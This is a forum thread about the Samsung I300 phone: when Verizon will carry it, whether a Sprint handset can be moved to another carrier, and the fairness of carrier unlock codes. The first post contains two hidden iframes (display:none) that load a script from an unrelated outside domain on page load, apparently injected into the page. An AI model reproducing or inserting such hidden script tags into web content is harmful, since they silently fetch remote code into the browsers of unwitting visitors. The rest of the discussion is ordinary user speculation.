+ Reply to Thread
Page 1 of 6 1 2 3 4 5 ... LastLast

Verizon

When will Verizon offer this phone? I am hesitant to go with Sprint? However, I can get the phone from Sprint in the next few days. What if I buy it now and activate with Verizon later. Will this work?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I seriously doubt it. Sprint has a lot of their own software built into the device. Maybe if you are sure Verison will have the rom image available, but still I'd be very hesitant to buy a sprint phone and use it with Verison. (also, the sprint logo is painted onto the device, which wouldn't change functionality, but might look bad if you're worried about that)

According to Samsung tech support, Verizon will offer the phone around Christmas time. Unless you know how to do it yourself, Verizon wil not activate the I300 at this time. Also, you will have to obtain the unlocking code from Sprint and this will cost you a minimum of $35 (activation fee).

Verizon

I just received an email from Samsung and they informed me that Verizon will have the phone in early December.

Programming

I asked an unrelated question in a thread that has faded and am sure someone may know.

When programming the I300, or any phone for that matter, a list appears that lists the name of perhaps 5 or 6 carriers i.e. Sprint, Verizon, etc. If one was to select one of the other options what would happen? Why are they there?

Administrator

Arrow

not a programmer, but it would probably set up the phone on that carriers terms...

for instance, if you set "verizon" instead of sprint, the phone will probably revert to verizons setup functions and render the phone useless on the sprint network.

just a hunch, but definately not something you would want to play with...

Certainly those options being programmed into the phone would suggest that, Mark? What I'm getting at is, could a Verizon customer purchase the phone and choose that option and be okay. By no means am I a programmer either thus my uncertainty. I'm just imagining that maybe the companies like to penalize you for switching by unnecessarily charging for a new phone.

Along time ago I had a pager and when I went to switch carriers they said they needed a code that had been placed on it. I asked the old carrier they wouldn't give it to me. The new guys said they had it but were trying to give me the shaft for switching carriers.

Perhaps this occurs in this industry as well?

Administrator

Arrow

ahhh i see now said the blind man...

its very possibile, your idea! once verizon starts selling the phones, lets see how the sign up process goes.. i set mine up over the phone and didnt pay atention to the screen you are talking about... did you see it while on the phone with sprint getting it activated?

You've got it! I wrote down the programming code just in case, but I'm not going anywhere! Just thought thats kind of crappy for those people on different carriers who may want the phone and think they can't have it.

Logically, the phones would either have the code sets built into them (it's not like Verizon, Sprint, etc...network specs change every day...) or the programing for each network is such that can be done with minimal effort.

Unless the ROM is different for each carrier (too much R&D costs IMHO), the phone should be able to work like you two just described.

dee
    oh, you're supposed to READ the manual....

What a load of CRAP!!!!

All this time, we are told that you cannot switch carriers without buying a phone from them!! If this is true, I smell a class action lawsuit!

Okay, I feel better now.... :p

Craig that is exactly how I feel. I thought I was alone in this and that you or Marc would have some high tech explanation for me. I'm surprised you guys never noticed this when programming your phones. All of my mobiles that I can remember have been like that. Something tells me that its not as simple as just activating the phone to that network but perhaps a minor detail would need to be changed.

You're probably right. We must be missing something here. At least I hope we are missing something here!

Craig

Administrator

Arrow

mj...

i never saw that screen come up on my phone... but i did not pay any attention either.. so im sure it DID come up..

had i paid more atention i would have wrote down the codes the rep gave me over the phone...

Though I would be upset about the lack of honesty by the various companies, I wouldn't be unhappy to learn that in the event that I become unhappy with Sprint, I have the option to switch service providers without sacrificing my phone.

<--------------Has no intention of leaving Sprint anytime soon!

Administrator

Arrow

<--------------Has no intention of leaving Sprint anytime soon!

i hear ya MJ.. i have no intention either.. sprint is way ahead of the times... but you would never tell with the cust. service reps...

I beg to differ Sir! After you stated your method of demanding customer service from Clare, I tried a few evenings ago and did not wait one second. The rep was a professional and I was shocked to say the least. I think they're doing a lot better.

Administrator

Arrow

yeah you are right.. depends on how you roll the dice... luckily i never really need cust. service, as i can doo all i need thru the website... some of the reps are pretty cool though... perhaps i was a little harsh...

yes the claire thingy works well!!!

i wanna meet claire... :o

I think its safe to say that within another year or two, most states will have laws requiring that cellular carriers release the codes to users after some reasonable condition is met.

Something like...

* instantly, without charge and without hassle, after 12 months of service with the phone, assuming no unpaid balance from that 12 month period of time exists.

* immediately, with no restrictions or strings attached, upon paying the carrier some openly-published release fee (pro-rated over 12 months of usage) that could change over time, but must apply equally to everyone seeking the activation code to the specific model of phone in the market in which it was sold. In other words, Sprint or Verizon could raise or lower the fee at will, but they'd have to openly publish the exact fee, and the negotiating skills of the person wanting the code would not be a factor. By "market", I mean the marketing region in which the phone was designated for sale (in other words, if Sprint or Verizon were to subsidize phones differently in New York and Florida and someone from Florida purchased a phone on eBay that had the higher/lower New York subsidy applied by its original purchaser, s/he would pay the New York release fee). In addition, the fee would be pro-rated over 12 months, and any usage by anyone involving that phone would count towards the 12 months. So if somebody in New York bought a phone, used it for 8 months, then sold it on eBay to somebody in Florida, the Florida purchaser would only have to pay 4/12 the current New York release fee.

Seems too complex to me. How about the carriers agree on a set of codes and stick to them. Its not that difficult. They're not just losing customers, they're also gaining. Kind of like the whole Napster fight. I purchased more CD's after hearing them on Napster than I ever have. May be stupid, but that was the trend.

*Hope I don't start a Napster string here*

+ Reply to Thread
Page 1 of 6 1 2 3 4 5 ... LastLast